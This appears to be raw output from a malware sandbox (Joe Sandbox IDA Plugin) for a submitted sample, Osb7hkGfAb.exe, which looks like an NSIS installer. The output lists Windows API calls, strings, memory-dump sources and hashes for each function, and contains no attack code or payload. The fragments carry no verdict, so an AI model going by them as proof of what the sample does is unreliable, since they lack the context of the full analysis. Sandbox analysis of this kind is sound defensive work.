                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                  • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                  • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,76F923A0), ref: 0040527A
                                                                  • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2531174081-0
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                  • GetMessagePos.USER32 ref: 00404AF1
                                                                  • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                  • MulDiv.KERNEL32(000D7516,00000064,000D8A80), ref: 00402E00
                                                                  • wsprintfA.USER32 ref: 00402E10
                                                                  • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402E0A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF82447
                                                                    • Part of subcall function 6FF81224: lstrcpynA.KERNEL32(00000000,?,6FF812CF,-6FF8404B,6FF811AB,-000000A0), ref: 6FF81234
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF823C2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6FF823D7
                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6FF823E8
                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 6FF823F6
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF823FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 3730416702-0
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                  • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGlobal
                                                                  • String ID:
                                                                  • API String ID: 2979337801-0
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                  • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                  • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                  • wsprintfA.USER32 ref: 00404A6A
                                                                  • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-297319885
                                                                  • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                  • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                  • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                  • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                                  • GetTickCount.KERNEL32 ref: 00402E6E
                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                  • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                  • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                  • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                  APIs
                                                                    • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                  • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                  • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 3248276644-297319885
                                                                  • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                  • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                  • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                  • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 004051C1
                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                    • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                  • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                  • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                  • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,76F93410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                  • GlobalFree.KERNEL32(0073A1F0), ref: 00403896
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-297319885
                                                                  • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                  • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                  • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                  • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405ADC
                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405AEA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-2743851969
                                                                  • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                  • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                  • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                  • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF8115B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF811B4
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF811C7
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF811F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: 72a54c6be233ea165eaa68b913117ccb89302b11a5902624c6b6389c463a02d0
                                                                  • Instruction ID: f8f0a705009566cb18456e1306370d1e33941b54a7af7cb534024920347fd037
                                                                  • Opcode Fuzzy Hash: 72a54c6be233ea165eaa68b913117ccb89302b11a5902624c6b6389c463a02d0
                                                                  • Instruction Fuzzy Hash: 4D316FB1514A44AFEF118FA8D949B767FFCFB07364B144716E875C6360DB3498108B21
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                                  • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                  • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                  • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                  • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8